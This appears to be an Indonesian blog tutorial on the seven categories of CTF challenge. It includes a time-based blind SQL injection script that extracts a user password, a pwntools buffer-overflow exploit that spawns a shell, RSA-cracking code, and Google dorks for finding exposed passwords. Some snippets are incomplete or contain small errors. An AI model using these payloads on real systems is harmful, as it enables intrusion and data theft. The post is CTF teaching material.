Capture The Flag : Panduan Lengkap Jenis Jenis Challange

12.07

0

💡 Fakta CTF: CTF modern mencakup 7 kategori utama challenge dengan kompleksitas berbeda-beda, mulai dari web hingga hardware hacking!

7 Jenis Challenge CTF (+Contoh Solusi)

1. Web Exploitation

Kerentanan umum: SQLi, XSS, CSRF, SSRF, RCE, File Inclusion

Tools: Burp Suite, OWASP ZAP, sqlmap, Postman

      # Contoh SQL Injection Time-Based

      import requests

      url = "http://ctf.example.com/search?query="

      chars = "abcdef0123456789{}_"

      flag = ""

      for i in range(1,30):

        for c in chars:

          payload = f"admin' AND IF(SUBSTR((SELECT password FROM users LIMIT 1),{i},1)='{c}',SLEEP(3),0)--"

          start = time.time()

          requests.get(url + payload)

          if time.time() - start > 3:

            flag += c

            print(f"Found: {flag}")

            break

Teknik lanjutan: Second-Order SQLi, Blind XXE, SSTI (Server-Side Template Injection)

2. Cryptography

Jenis challenge: Classical cipher, RSA flaws, AES ECB weakness, Hash collisions

Tools: CyberChef, RsaCtfTool, Hashcat, SageMath

      # Crack RSA dengan modulus kecil (n < 256-bit)

      from Crypto.Util.number import long_to_bytes

      from factordb.factordb import FactorDB

      n = 742449129124467073921545687640895127535705902454369756401331

      e = 65537

      c = 39207274348578481322317340648475596807303160111338236677373

      f = FactorDB(n)

      f.connect()

      factors = f.get_factor_list()

      p, q = factors

      phi = (p-1)*(q-1)

      d = pow(e, -1, phi)

      plain = pow(c, d, n)

      print(long_to_bytes(plain))  # Output: b'FLAG{s1mpl3_rs4}'

Kerentanan umum: Padding oracle, Nonce reuse, Weak PRNG, Homomorphic encryption flaws

3. Reverse Engineering

Target: ELF binaries, Windows PE, Android APK, .NET assemblies

Tools: Ghidra, IDA Pro, radare2, Binary Ninja

      # Analisis fungsi kunci dengan Ghidra

      void check_flag(char *input) {

        char encrypted[32] = {0x12, 0x45, 0x78, ...};

        for (int i = 0; i < 32; i++) {

          if ((input[i] ^ 0x55) != encrypted[i]) {

            puts("Wrong flag!");

            exit(0);

          }

        }

        puts("Correct flag!");

      }

      # Solusi Python:

      encrypted = [0x12, 0x45, 0x78, ...]

      print(''.join([chr(c ^ 0x55) for c in encrypted]))

      # Output: FLAG{x0r_r3v3rs1ng}

Teknik lanjutan: Anti-debugging bypass, Unpacking malware, ARM Thumb mode analysis

4. Forensics

Jenis file: PCAP, memory dumps, disk images, steganography

Tools: Wireshark, Volatility, binwalk, steghide

      # Ekstraksi data tersembunyi dari gambar

      $ binwalk -e suspicious_image.jpg

      $ strings image.jpg | grep "FLAG{"

      $ steghide extract -sf image.jpg -p "password123"

      # Analisis PCAP untuk eksfiltrasi data

      $ tshark -r traffic.pcap -Y "http.request.method==POST" -T fields -e urlencoded-form.value

      $ tshark -r traffic.pcap -Y "dns.qry.name contains 'flag'"

Teknik khusus: File carving, Metadata analysis, LSB steganography, USB traffic reconstruction

5. Binary Exploitation (Pwn)

Kerentanan: Buffer overflow, ROP, Format string, Heap exploitation

Tools: pwntools, gdb-peda, ROPgadget, one_gadget

      # Contoh exploit buffer overflow sederhana

      from pwn import *

      elf = context.binary = ELF('./vuln_program')

      p = process()

      offset = 72

      payload = flat(

        b'A'*offset,

        elf.sym['win']  # Alamat fungsi win()

      )

      p.sendline(payload)

      p.interactive()  # Dapat shell!

Konsep penting: ASLR bypass, Canary bypass, GOT overwrite, House of Force

6. OSINT (Open Source Intelligence)

Fokus: Investigasi digital, Geolocation, Metadata analysis

Tools: Maltego, theHarvester, exiftool, Google Dorks

      # Google Dorking untuk menemukan informasi sensitif

      site:example.com ext:pdf "confidential"

      intitle:"index of" "backup"

      filetype:sql "password"

      # Analisis metadata gambar

      $ exiftool suspect_image.jpg

      $ strings image.jpg | grep -i "copyright"

Sumber data: WHOIS records, Wayback Machine, Social media footprints

7. Miscellaneous

Variasi challenge: Programming puzzles, Math problems, AI challenges

Contoh: Maze solving, SAT solving, Blockchain analysis

      # Solusi programming challenge (Prime Factorization)

      from sympy import factorint

      def solve(n):

        factors = factorint(n)

        return ' '.join(f'{p}^{e}' for p,e in factors.items())

      print(solve(123456789))  # Output: '3^2 3607^1 3803^1'

Kategori khusus: Hardware hacking, IoT security, Side-channel attacks

Strategi Penyelesaian Challenge

🔍 Analisis Awal

Baca deskripsi dengan cermat
Identifikasi jenis challenge
Periksa semua file terkait

🛠️ Eksplorasi

Gunakan tools yang relevan
Test berbagai pendekatan
Dokumentasikan temuan

🎯 Eksploitasi

Kembangkan payload
Otomatisasi proses
Verifikasi hasil

📚 Sumber Belajar

LiveOverflow (YouTube): Tutorial binary exploitation
CTF Field Guide (GitBook): Panduan komprehensif
CTFtime.org: Jadwal kompetisi CTF global
PicoCTF: Platform belajar untuk pemula

Tags: Cyber Security

*

Posting Komentar (0)